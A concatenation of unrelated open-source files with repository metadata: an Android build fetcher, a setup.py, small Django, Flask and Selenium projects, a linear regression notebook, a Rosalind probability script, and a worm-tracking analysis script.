resource_id=artifact,
dest=os.path.join(out_dir, artifact))
def get_latest_build_id(client, branch, target):
"""Get the latest build id.
Args:
client: An authorized instance of an android build api client for making
requests.
branch: The branch to download from
target: The target name to download from.
Returns:
The build id.
"""
build_response = get_build_list(
client=client,
branch=branch,
target=target,
maxResults=1,
successful=True,
buildType='submitted')
if not build_response:
raise ValueError('Unable to determine latest build ID!')
return build_response['builds'][0]['buildId']
def fetch_latest_artifacts(client, out_dir, target, pattern, branch):
"""Fetches target files artifacts matching patterns from the latest build.
Args:
client: An authorized instance of an android build api client for making
requests.
out_dir: The directory to store the fetched artifacts to.
target: The target name to download from.
pattern: A regex pattern to match to artifacts filename
branch: The branch to download from
"""
build_id = get_latest_build_id(
client=client, branch=branch, target=target)
fetch_artifacts(client, out_dir, target, pattern, build_id)
| [
"rick_tan@qq.com"
] | rick_tan@qq.com |
78c6cf70c1e2edc91311af5f97961551cec1e653 | 6013df9a764d5c678192d28aa2378d283d40f849 | /busca-jogos/setup.py | c1687ca9cc58f39071a23348a057a2ff389bbb3a | [
"MIT"
] | permissive | IvanBrasilico/AI-NanoDegree | a3559c5062afd08bbb4db48ce24672af38e4af36 | 531e63d99ae906b5908e064e9b716ebe22e48c8f | refs/heads/master | 2021-05-09T18:16:17.509603 | 2019-03-12T17:32:53 | 2019-03-12T17:32:53 | 119,159,570 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,394 | py | from setuptools import find_packages, setup
setup(
name='busca',
description='Busca Patio',
version='0.0.1',
url='https://github.com/IvanBrasilico/busca',
license='GPL',
author='Ivan Brasilico',
author_email='brasilico.ivan@gmail.com',
packages=find_packages(),
install_requires=[
'jupyter',
'numpy',
'matplotlib',
'scikit-learn'
],
setup_requires=['pytest-runner'],
tests_require=['pytest'],
test_suite="tests",
package_data={
},
extras_require={
'dev': [
'alembic',
'autopep8',
'bandit',
'coverage',
'flake8',
'flake8-quotes',
'flake8-docstrings',
'flake8-todo',
'isort',
'mypy',
'pyannotate',
'pylint',
'pytest',
'pytest-cov',
'pytest-mock',
'radon',
'testfixtures',
'tox'
],
},
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)',
'Operating System :: POSIX',
'Topic :: Software Development :: User Interfaces',
'Topic :: Utilities',
'Programming Language :: Python :: 3.6',
],
)
| [
"Iv@n1234"
] | Iv@n1234 |
330866240a79c36dc0cade8d6a8bc2b898625667 | 94743a85befdf16892cd28f771cd96373ddc995f | /LIA.py | dfd77d0bd450fac8e95aaee9249ff7463d90abbd | [] | no_license | doelling/Rosalind | caa0201d792bd2aa06d76d53916e75858a3ca67a | ddefdab630fa9712cb7a69b540c2c4921d34f5d9 | refs/heads/master | 2020-06-03T13:46:12.055127 | 2019-07-03T16:33:25 | 2019-07-03T16:33:25 | 191,591,438 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 378 | py | import math
def combo(n, k):
combin = float(math.factorial(n)/(math.factorial(k)*math.factorial(n-k)))
return combin
def main():
gens = int(input())
atLeast = int(input())
totalDesc = 2 ** gens
prob = 0
for i in range(atLeast, totalDesc + 1):
prob += float(combo(totalDesc, i)*(0.25 ** i)*(0.75 ** (totalDesc - i)))
print(prob)
main()
| [
"45838137+doelling@users.noreply.github.com"
] | 45838137+doelling@users.noreply.github.com |
15a60453aa5419b4fa377688c031c2632596a4f9 | 7ce479cac0a14d924159db9c784e3325b8f0bce7 | /schemaorgschemas/Thing/MedicalEntity/MedicalProcedure/__init__.py | cbefd8704afe1d477dfc83e65cb81ce50f18686e | [] | no_license | EvelineAndreea/AGRe | 1f0c27237eb047a60bbcfb8d73e3157035406409 | b952125896a82741f6617c259dd4060954583180 | refs/heads/master | 2020-04-08T16:08:11.517166 | 2018-11-28T07:15:56 | 2018-11-28T07:15:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,059 | py | # -*- coding: utf-8 -*-
from schemaorgschemas.Thing import potentialActionProp, nameProp, sameAsProp, imageProp, urlProp, mainEntityOfPageProp, additionalTypeProp, alternateNameProp, descriptionProp
from schemaorgschemas.Thing.MedicalEntity import codeProp, relevantSpecialtyProp, studyProp, guidelineProp, recognizingAuthorityProp, medicineSystemProp
from schemaorgschemas.djangoschema import SchemaObject, SchemaProperty, SchemaEnumProperty, SCHEMA_ORG
from django.conf import settings
class MedicalProcedureSchema(SchemaObject):
"""Schema Mixin for MedicalProcedure
Usage: place after django model in class definition, schema will return the schema.org url for the object
A process of care used in either a diagnostic, therapeutic, or palliative capacity that relies on invasive (surgical), non-invasive, or percutaneous techniques.
"""
def __init__(self):
self.schema = 'MedicalProcedure'
class followupProp(SchemaProperty):
"""
SchemaField for followup
Usage: Include in SchemaObject SchemaFields as your_django_field = followupProp()
schema.org description:Typical or recommended followup care after the procedure is performed.
prop_schema returns just the property without url#
format_as is used by app templatetags based upon schema.org datatype
"""
_prop_schema = 'followup'
_expected_schema = None
_enum = False
_format_as = "TextField"
class preparationProp(SchemaProperty):
"""
SchemaField for preparation
Usage: Include in SchemaObject SchemaFields as your_django_field = preparationProp()
schema.org description:Typical preparation that a patient must undergo before having the procedure performed.
prop_schema returns just the property without url#
format_as is used by app templatetags based upon schema.org datatype
"""
_prop_schema = 'preparation'
_expected_schema = None
_enum = False
_format_as = "TextField"
class procedureTypeProp(SchemaProperty):
"""
SchemaField for procedureType
Usage: Include in SchemaObject SchemaFields as your_django_field = procedureTypeProp()
schema.org description:The type of procedure, for example Surgical, Noninvasive, or Percutaneous.
prop_schema returns just the property without url#
format_as is used by app templatetags based upon schema.org datatype
used to reference MedicalProcedureType"""
_prop_schema = 'procedureType'
_expected_schema = 'MedicalProcedureType'
_enum = False
_format_as = "ForeignKey"
class howPerformedProp(SchemaProperty):
"""
SchemaField for howPerformed
Usage: Include in SchemaObject SchemaFields as your_django_field = howPerformedProp()
schema.org description:How the procedure is performed.
prop_schema returns just the property without url#
format_as is used by app templatetags based upon schema.org datatype
"""
_prop_schema = 'howPerformed'
_expected_schema = None
_enum = False
_format_as = "TextField"
# schema.org version 2.0
| [
"mihai.nechita95@gmail.com"
] | mihai.nechita95@gmail.com |
222a8516170dbdfd60052c5217c8dbe791724e6b | a6df74bc7c139734bd9ce9f48d51e08fdc7d7efb | /article/migrations/0016_auto_20210412_1456.py | 34b4c21151d60a7d9f4aa95d47c0410f17c749cc | [] | no_license | Erlan1998/python_group_7_homework_68_Erlan_Kurbanaliev | 5a7f210e51f1998e5d52cdeb42538f2786af3f9f | fdc92be2c5187c78fecdc713f58e0e3e9fc62cb1 | refs/heads/master | 2023-05-03T17:01:59.066596 | 2021-05-26T13:28:41 | 2021-05-26T13:28:41 | 368,165,221 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 495 | py | # Generated by Django 3.1.6 on 2021-04-12 14:56
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('article', '0015_auto_20210412_1444'),
]
operations = [
migrations.AlterModelOptions(
name='article',
options={'permissions': [('сan_have_piece_of_pizza', 'Может съесть кусочек пиццы')], 'verbose_name': 'Статья', 'verbose_name_plural': 'Статьи'},
),
]
| [
"kurbanalieverlan@gmail.com"
] | kurbanalieverlan@gmail.com |
a28620373059999056f5a6645c8aa4c8770c27d6 | 017f71ae002c10542dbd534a2b4645e247d4b2cb | /caicolanches/pedidoCli/apps.py | 0a75d3fb97e553852323d1494b306c158476b22a | [
"Apache-2.0"
] | permissive | GeraldoMedeiros/Caico_Lanches | fdbdb084824698a45af878009beeab6e233b69f0 | a853d6884a09d7c879974f4549dd7316ea7991df | refs/heads/master | 2021-07-20T08:13:39.317248 | 2020-10-24T18:37:35 | 2020-10-24T18:37:35 | 216,081,219 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 93 | py | from django.apps import AppConfig
class PedidocliConfig(AppConfig):
name = 'pedidoCli'
| [
"geraldo_sjs@hotmail.com"
] | geraldo_sjs@hotmail.com |
356241816157a0fc2f851715088c5e233b1bf34c | 5ca8e1f1513c17f08a4b6334b6cf130a2b213530 | /Linear Regression/simple_linear_regression.py | dcb69ac17ad5fa7fd2bc538eea8a1a96251b8509 | [] | no_license | justbydev/machine-learning | 3c86e92616aa5c2587478371a797932e95cefe2b | 9fab86632081b9ca0ff95a03b19e811153db2d15 | refs/heads/master | 2023-06-07T06:11:38.155833 | 2021-06-25T01:47:40 | 2021-06-25T01:47:40 | 299,304,026 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,686 | py | # -*- coding: utf-8 -*-
"""simple_linear_regression.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1LXUY6xbN50a5uA4LjulRdwWaSP2TZ0--
Import modules
"""
import numpy as np
import matplotlib.pyplot as plt
"""Setting Data"""
data = np.array([[100, 20], #출처:우아한 형제들 기술 블로그, [배달거리, 배달시간]
[150, 24],
[300, 36],
[400, 47],
[130, 22],
[240, 32],
[350, 47],
[200, 42],
[100, 21],
[110, 21],
[190, 30],
[120, 25],
[130, 18],
[270, 38],
[255, 28]])
x=data[:, 0].reshape((data.shape[0], 1))
y=data[:, 1].reshape((data.shape[0], 1))
fig, ax=plt.subplots()
for i in range(data.shape[0]):
ax.plot(x[i][0], y[i][0], marker='o', color='blue')
"""Setting Hyperparameter"""
learning_rate=0.00001
epoch=300000
weight=np.random.rand()
bias=np.random.randint(5, 20)
print(weight, bias)
"""Make Cost function(MSE)"""
def error_function(W, b):
y_pred=x*W+b
return np.sum((y_pred-y)**2)/len(y)
"""Predict"""
def predict():
return weight*x+bias
"""Derivative of Error(using numerical derivative)"""
def numerical_derivative(f, W, b):
h=1e-4
grad=np.zeros((1, 2))
w_fx1=f(float(W)+h, b)
w_fx2=f(float(W)-h, b)
grad[0, 0]=(w_fx1-w_fx2)/(2*h)
b_fx1=f(W, float(b)+h)
b_fx2=f(W, float(b)-h)
grad[0, 1]=(b_fx1-b_fx2)/(2*h)
return grad
"""Training"""
for i in range(epoch):
grad=numerical_derivative(error_function, weight, bias)
weight=weight-learning_rate*grad[0, 0]
bias=bias-learning_rate*grad[0, 1]
if i%15000==0:
print('Epoch=', i, ' error_value=', error_function(weight, bias), "W=", weight, "b=", bias)
| [
"noreply@github.com"
] | justbydev.noreply@github.com |
3f6f9421f822fd2a774361edb18fd8c12c87027d | b58b175263f275e15a1b56bf1b0914db0f35ffc8 | /testcase/testcase_lan.py | 8d4326cbd823f38fc4d2cbf52a1cb50582dc55ed | [] | no_license | zeewii/BHU | aa9ff900a4bb6adb368081509b9f9222479f7742 | 1f3c4f634b44845f7a4f84535ff4904de4efc634 | refs/heads/master | 2021-01-09T21:49:01.534541 | 2015-09-30T09:21:28 | 2015-09-30T09:21:28 | 43,213,971 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,828 | py | #coding=utf-8
#描述:该模块为测试lan模块
#作者:曾祥卫
import unittest
from selenium import webdriver
import time,os,commands
from selenium.webdriver.common.action_chains import ActionChains
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import NoAlertPresentException
from login import login_control
from data import data
from network.interface import interface_control
from connect import ssh
from publicControl import public_control
from network.interface.lan import lan_business
from network.interface import interface_business
class TestLan(unittest.TestCase):
def setUp(self):
self.driver = webdriver.Firefox()
#将浏览器最大化
self.driver.maximize_window()
#使用默认ip登录lan页面
lan_business.goin_default_lan(self)
def test_054_055_IP_netmask(self):
u"""修改LAN IP和A,B,C类子网掩码"""
#把4次修改LAN IP和子网掩码后client ping修改后ip的值取出
result = lan_business.step_100msh0054_100msh0055(self)
print result
#如果4次都为0则通过,否则不通过
assert result == [0,0,0,0],u"测试LAN IP和A,B,C类子网掩码失败"
print u"测试LAN IP和A,B,C类子网掩码成功"
def test_056_custom_netmask(self):
u"""lan自定义掩码设置"""
result = lan_business.step_100msh0056(self)
print result
#如果4次都为1则通过,否则不通过
assert result == [1,1,1,1],u"测试lan自定义掩码设置失败"
print u"测试lan自定义掩码设置成功"
def test_057_broadcast(self):
u"""lan广播地址配置有效性测试"""
result = lan_business.step_100msh0057(self)
print result
#如果2次都为1则通过,否则不通过
assert result == [1,1],u"测试lan广播地址配置有效性失败"
print u"测试lan广播地址配置有效性成功"
def test_059_startip(self):
u"""IP地址池默认起始值检查"""
result = lan_business.step_100msh0059(self)
print result
#如果IP地址池默认起始值为100则通过,否则不通过
assert result == '100',u"测试IP地址池默认起始值失败"
print u"测试IP地址池默认起始值成功"
def test_067_068_abnormal_input(self):
u"""lan异常输入测试"""
result = lan_business.step_100msh0067_100msh0068(self)
print result
#如果4次都为1则通过,否则不通过
assert result == [1,1,1,1],u"测试lan异常输入测试失败"
print u"lan测试异常输入测试成功"
#退出清理工作
def tearDown(self):
self.driver.quit()
if __name__=='__main__':
unittest.main()
__author__ = 'zeng'
| [
"zeewii@sina.com"
] | zeewii@sina.com |
5a65c3db8f5241c487aab78f930d7ec197529388 | 5a4d5ee624b375ece06fda1467afe18beb69c14b | /Algorithm/SW_Expert/1-46.py | e2fcfc033cbfedd0121723aaeb2c5ba1ecc91913 | [] | no_license | Knightofcydonia51/TIL | cd10dab949659bc827118ee42b25d926336dce23 | 78d7e8617f4abed9932a557c12e68bd950f8230d | refs/heads/master | 2022-12-26T00:10:06.262200 | 2022-05-26T01:12:32 | 2022-05-26T01:12:32 | 195,938,010 | 0 | 0 | null | 2022-12-16T01:03:09 | 2019-07-09T05:22:49 | Python | UTF-8 | Python | false | false | 218 | py | def score(text):
result=list(map(lambda x: 4 if x=='A' else 3 if x=='B' else 2 if x=='C' else 1 ,text))
return sum(result)
print(score('ADCBBBBCABBCBDACBDCAACDDDCAABABDBCBCBDBDBDDABBAAAAAAADADBDBCBDABADCADC')) | [
"leavingwill@gmail.com"
] | leavingwill@gmail.com |
9c61a034388f415eedc4cc4f25c3125988bd75c3 | 4f746d3986e31e969a080741ec9e678be12aa6aa | /07-iteraties/het grootste en het gemiddelde.py | b6fb82cbdf3b7b93fca654bc94d8abb14a7c12e1 | [] | no_license | BramCoucke/5WWIPython | cfac8da964419cd491f9d95a78118f76dfdd3eba | 6b3c1e98fabd17d13c407b93e0c9835f3ccfe250 | refs/heads/master | 2020-07-21T05:14:40.365292 | 2020-03-06T10:51:14 | 2020-03-06T10:51:14 | 206,760,388 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 377 | py | #invoer
aantal_getallen = int(input('aantal getallen: '))
getal1 = int(input('geefgetal: '))
maximum = getal1
som = getal1
for getal in range(0, aantal_getallen - 1):
getal = int(input('geef getal: '))
som = som + getal
maximum = max(maximum, getal)
gem = som/aantal_getallen
print('Het grootste getal is',maximum,'en het gemiddelde is {:.2f}'.format(gem))
| [
"bram.coucke1@sgsintpaulus.eu"
] | bram.coucke1@sgsintpaulus.eu |
284a991df8a2c106f0b4d374a3b50f95312a9c67 | bdd0ea0108d80fe8e663ac752968d51eace9043b | /app.py | 547f26c41092b580ef8d53777db5d6e769086715 | [] | no_license | Vphiladaeng/Web_Scraping_Challenge | b2cad828d9b825f24d6fac3c5e08160025000707 | 2dd336e26d0566606ec72c262907f147cd568316 | refs/heads/master | 2022-11-12T01:55:05.440366 | 2020-07-01T05:40:00 | 2020-07-01T05:40:00 | 272,603,316 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,173 | py | # Import Dependencies
from flask import Flask, render_template, redirect
from flask_pymongo import PyMongo
import scrape_mars
import os
# Hidden authetication file
#import config
# Create an instance of Flask app
app = Flask(__name__)
# Use flask_pymongo to set up mongo connection locally
app.config["MONGO_URI"] = "mongodb://localhost:27017/mars_app"
mongo = PyMongo(app)
# Create route that renders index.html template and finds documents from mongo
@app.route("/")
def home():
# Find data
mars_info = mongo.db.mars_info.find_one()
# Return template and data
return render_template("index.html", mars_info=mars_info)
# Route that will trigger scrape function
@app.route("/scrape")
def scrape():
# Run scrapped functions
mars_info = mongo.db.mars_info
mars_data = scrape_mars.scrape_mars_news()
mars_data = scrape_mars.scrape_mars_image()
mars_f = scrape_mars.scrape_mars_facts()
mars_w = scrape_mars.scrape_mars_weather()
mars_data = scrape_mars.scrape_mars_hemispheres()
mars_info.update({}, mars_data, upsert=True)
return redirect("/", code=302)
if __name__ == "__main__":
app.run(debug= True) | [
"58916900+Vphiladaeng@users.noreply.github.com"
] | 58916900+Vphiladaeng@users.noreply.github.com |
7646235fc23a659c348f282fe46ba57f17a37f31 | 06cb58b807f0e44fde3b17f6241c0f9aea8c970a | /djangoproject/settings.py | c9f84bd5f1f881ef94ad5f1745028bd8114c90d9 | [] | no_license | hulumei123/Django-OpenCV | 3d0b908b4fb5d4852b69bad15ab0c681bca8f2ae | b8395e346725526d6cb6d76216a2eca8a7e5db55 | refs/heads/master | 2020-04-08T15:12:25.111752 | 2018-11-28T11:13:20 | 2018-11-28T11:13:20 | 159,469,912 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,448 | py | # -*- coding: utf-8 -*-
"""
Django settings for djangoproject project.
Generated by 'django-admin startproject' using Django 1.11.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'h3cd^cftn%zvld8s5(jkzw=r=4qwuif&=@c!thx%+*_3y0k$+d'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*', ]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'img_db',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'djangoproject.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'djangoproject.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media').replace('\\', '/') #设置静态文件夹路径,为本地文件的路径 BASE_DIR为主目录
MEDIA_URL = '/media/' #url映射,在网址上访问的路径(show的时候需要用的)
| [
"18717753697@163.com"
] | 18717753697@163.com |
bd692ef3d3cce53cc175de340df496d1c8586914 | eb518a18d8055400c85d1b2f714fe9d4d654b941 | /compare_segworm/_old/head_tail_manual_switched.py | 6948c7b9e0ebe75f72f883facddf4243954e34e8 | [] | no_license | ver228/single-worm-analysis | c755709354025f629f7c774749394743c7b9a46b | 8d0a442fb93ad25aa30743f6c31f883639524a4d | refs/heads/master | 2021-09-14T11:31:17.761390 | 2018-05-12T23:00:54 | 2018-05-12T23:00:54 | 79,457,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,602 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Feb 11 22:01:59 2016
@author: ajaver
"""
import h5py
import tables
import os
import numpy as np
import matplotlib.pylab as plt
from scipy.io import loadmat
import glob
import os
import pandas as pd
from MWTracker.featuresAnalysis.obtainFeaturesHelper import WormFromTable
from MWTracker.featuresAnalysis.obtainFeatures import getMicronsPerPixel, getFPS
good_files_str = '''/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-116 (e2310)III on food L_2010_07_29__14_56___3___8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/osm-9 (ky10) on food R_2010_06_15__14_57_24___8___8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-108 (n501)I on food L_2009_12_10__14_02_38___2___9.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-103 (e1597)II on food R_2010_08_06__15_41_28___8___11.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/flp-25 (gk1016)III on food L_2010_01_12__13_07_15___4___8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-6 (n592)X on food L_2010_05_11__14_51_15___7___8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-14 (n549)X on food L_2010_07_15__16_20___3___14.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/flp-6 (ok3056)V on food R_2010_01_14__11_35___3___4.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/gar-2 (ok250)III on food R_2010_07_22__11_23_27___1___3.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/N2 on food R_2011_05_24__13_03_48___7___6.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/vab-7 (e1562)III on food L_2011_10_13__11_49_40___1___2.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/flp-25 (gk1016)III on food R_2010_01_12__13_06_48___2___8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-6 (n592)X on food R_2010_05_13__15_47___3___13.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/N2 on food L_2010_11_26__16_25_46___6___13.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/flp-16 (ok3085) on food L_2010_01_11__12_35_14___7___4.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/flr-1 (ut11) on food L_2010_04_09__15_53_02___1___14.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-32 (n155)I on food l_2010_05_11__16_50_11___7___13.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-1 (n487)V on food R_2010_07_15__11_47_56___1___4.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/daf-5 (e1386)II on food L_2010_07_22__14_46_33__8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/rab-3 (cy250) on food L_2011_08_04__11_10_43___2___3.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/acr-2 (ok1887) on food r_2010_02_19__14_43_43___8___13.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-27 (ok151)II on food R_2010_09_24__12_55___3___6.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-32 (n155)I on food R_2010_05_13__15_03_22___1___11.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-16 (e109) on food L_2009_12_11__12_21___3___2.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-63 (ok1075) on food L_2010_04_16__12_57_13___8___8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-12 (n602)V on food L_2010_07_16__12_05_00___1___6.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/gpa-8 (pk435)V on food L_2010_03_11__10_25_35___8___2.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-79 (e1068)III on food L_2010_04_13__15_39_23___8___14.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-46 (n1127)V on food L_2010_08_06__16_02_11___7___13.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-8 (v488) on food R_2011_09_20__13_33_10___7___7.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/N2 on food L_2010_11_09__15_36_39___1___8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-60 (e273)V on food L_2010_04_15__13_07_43__9.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/asic-1 (ok415) on food R_2010_06_15__11_26_21___2___3.hdf5'''
partial_files_str = '''/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-116 (e2310)III on food L_2010_07_29__14_56___3___8.hdf5
15401-15415
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-101 (e1265) on food L_2010_09_23__12_37_31___8___6.hdf5
19804-19806, 19819-19830, 19886-19893, 19904-19907, 19921-19931, 19938-19938, 19945-19945, 19985-19986, 20055-20055
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-27 (ok151)II on food L_2010_08_05__14_44_24___2___11.hdf5
14045-14045, 14173-14184, 14226-14226, 14298-14298, 14333-14334, 14344-14344, 14378-14378
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/trp-1 (sy691) on food R_2010_04_21__14_59_17___8___10.hdf5
12231-12231, 12242-12243, 12250-12273, 12285-12285, 12295-12299, 12306-12306, 12331-12346, 12421-12457, 12464-12469, 12479-12480, 12664-12664, 12677-12701, 12830-12888, 12895-12923, 12930-12931,
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-104 (e1265)III on food R_2011_10_18__15_39___4___10.hdf5
2608-3747, 3755-5270
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-105 (ok1432) on food L_2010_07_06__11_44_23___2___6.hdf5
1812-1819, 1826-1832
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/acr-15 (ok1214)X on food L_2010_02_24__15_45_04___8___14.hdf5
250-411, 419-424, 700-700, 793-799, 808-811, 1012-1018, 1032-1032, 18761-18814
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-101 (e1265) on food R_2010_09_24__11_35___3___2.hdf5
810-810, 18597-18597, 18608-18608, 23978-23982, 23988-23993
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-38 (e264)I on food L_2010_08_19__12_34_15___1___6.hdf5
7480-7582, 7590-7590, 7596-7596, 7603-7607, 7617-7643, 7652-7652, 7663-7722, 7733-7736, 7806-7963
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-76 (e911)V on food L_2010_04_14__11_22_30___8___5.hdf5
12445-12445, 12455-12459, 12475-12316, 12242-13344, 13354-13362, 13368-15598, 18411-18411, 18510-18510
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-76 (e911)V on food R_2010_04_13__11_06_24___4___3.hdf5
3240-3249, 3258-3265, 3286-3294, 3328-3332, 18547-18547, 18585-18589
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-101 (e1265) on food L_2010_09_17__16_04_15___1___8.hdf5
20530-20530, 20536-23004 '''
bad_track_files_str = '''/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-32 (e189) on food L_2009_12_09__15_57_51___2___13.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/acr-21 (ok1314)III on food L_2010_02_24__14_45_13__11.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-17 (e245) on food R_2010_04_16__14_27_23___2___8.hdf5'''
wrong_files_str = '''/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-1 (e1598)X on food R_2010_04_14__11_58_21___2___7.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-18 (e81)X on food R_2011_08_09__12_33_45___8___7.hdf5'''
partial_wrong_files_str ='''/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-18 (e81)X on food R_2011_08_24__10_24_18__2.hdf5
17709-17735, 17743-17758, 17772-17772, 17782-17788, 17795-17795, 17801-17801'''
good_files = good_files_str.split('\n')
bad_track_files = bad_track_files_str.split('\n')
wrong_files = wrong_files_str.split('\n')
def read_partial_files(f_str):
dd = f_str.split('\n')
index_dict = {}
fnames = []
for ii in range(0, len(dd),2 ):
fname = dd[ii]
indexes_str = dd[ii+1]
indexes = [tuple(map(int, x.split('-'))) for x in indexes_str.split(', ') if x]
index_dict[fname] = indexes
fnames.append(fname)
return fnames, index_dict
partial_files, bad_index_dict = read_partial_files(partial_files_str)
wrong_partial_files, good_index_dict = read_partial_files(partial_wrong_files_str)
files = bad_track_files + partial_files + wrong_partial_files+ wrong_files + good_files
all_dat = []
for mask_id, masked_image_file in enumerate(files):
dd = masked_image_file[:-5]
segworm_feat_file = dd + '_features.mat'
skeletons_file = dd + '_skeletons.hdf5'
features_file = dd + '_features.hdf5'
if not os.path.exists(features_file):
continue
print(mask_id, masked_image_file)
#read data from the new sekeltons
skeletons = np.zeros(0) #just to be sure i am not using a skeleton for another file
with tables.File(features_file, 'r') as fid:
#if '/features_means' in fid and \
#fid.get_node('/features_means').attrs['has_finished'] and \
#fid.get_node('/features_timeseries').shape[0]>0:
skeletons = fid.get_node('/skeletons')[:]
